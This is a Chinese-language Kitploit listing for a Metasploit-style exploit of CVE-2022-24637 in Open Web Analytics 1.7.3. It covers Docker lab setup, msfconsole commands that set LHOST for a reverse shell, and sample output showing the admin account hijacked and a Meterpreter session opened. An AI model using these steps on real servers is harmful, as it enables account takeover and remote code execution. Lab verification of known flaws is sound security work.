Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-24637 — 开放网络分析 1.7.3 - 远程代码执行 | Kitploit
工具/GitHubGitHub/pflegusch/cve-2022-24637
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

开放网络分析 1.7.3 - 远程代码执行

查看仓库
443年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

易受攻击的应用

1.7.4 之前的 Open Web Analytics (OWA) 允许未经身份验证的远程攻击者获取敏感用户信息,此信息可用于通过利用缓存哈希获取管理员权限。这是由于使用 `<?php (而不是预期的 "<?php 序列生成的文件)未被 PHP 解释器处理。

验证步骤

  1. 使用 Docker 启动一个易受攻击的 OWA 实例

    • 下载 https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • 启动容器:docker compose up -d
    • 打开 http://127.0.0.1:80/
    • 使用 docker-compose.yml 文件中的环境变量执行安装步骤
      • 公共 URL:http://127.0.0.1/
      • 数据库主机(docker inspect <db-container> 获取 IPAddress,例如 172.22.0.2)
      • 数据库端口:3306
      • 数据库名称:owa
      • 数据库用户:owa
      • 数据库密码:Demo12+#
      • 继续
      • 站点域名:http://127.0.0.1
      • 管理员名称:admin
      • 电子邮件:[email protected]
      • 密码:Demo12+#
      • 继续
  2. 启动 msfconsole

  3. use exploit/multi/http/open_web_analytics_rce

  4. set RHOSTS 127.0.0.1

  5. set RPORT 80

  6. set SSL false

  7. set LHOST 172.22.0.1 -> 这需要是 docker compose up -d 命令创建的桥接 IP

  8. check

  9. run

选项

Password

当利用目标时,受攻击用户的密码将被此密码覆盖。

Username

此漏洞利用所针对的用户。

高级选项

SearchLimit

该漏洞利用的方式是:当用户尝试登录时,每个用户都会生成一个缓存文件,其中包含 temp_passkey 值。由于 /owa-data/caches/ 目录可公开访问,我们可以获取这些缓存文件。缓存文件的确切路径取决于 user_id,并且可以通过该值计算得出。此选项定义从 0 开始,应检查多少个计算出的路径,以查找包含 temp_passkey 值的缓存文件。

场景

使用上述 Docker 部署的版本 1.7.3

root@kitploit:~
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
下载工具